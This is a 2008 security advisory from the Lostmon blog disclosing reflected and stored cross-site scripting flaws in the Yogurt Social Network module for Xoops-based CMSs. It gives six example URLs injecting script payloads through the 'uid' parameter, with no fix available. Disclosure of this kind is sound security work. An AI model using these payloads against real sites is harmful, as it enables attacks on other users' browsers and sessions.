Yogurt Social Network multiple scripts uid variable XSS

Saturday, August 09, 2008
##########################################
Yogurt Social Network multiple scripts uid variable XSS
Vendor url:http://sourceforge.net/project/
showfiles.php?group_id=204109
Advisore:http://lostmon.blogspot.com/2008/08/
yogurt-social-network-multiple-scripts.html
Vendor notify:no exploits availables:yes
##########################################


Yogurt Social Network is a social network php/Mysql script
module for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Yogurt Social Network contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'uid' variable upon
submission to Multiple scripts script in yogurt module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

Yogurt Social Network 3.2 rc1

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

###########
Examples
###########

http://localhost/impresscms/htdocs/modules/yogurt/friends.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/seutubo.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/album.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/scrapbook.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/index.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/
tribes.php?uid=1"><script>alert(1)</script>

Also the a autenticated user can compose a new scrap with XSS code
in description texarea, and it is executed wen a user looks the
attacker malformed scrap.(stored XSS).


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...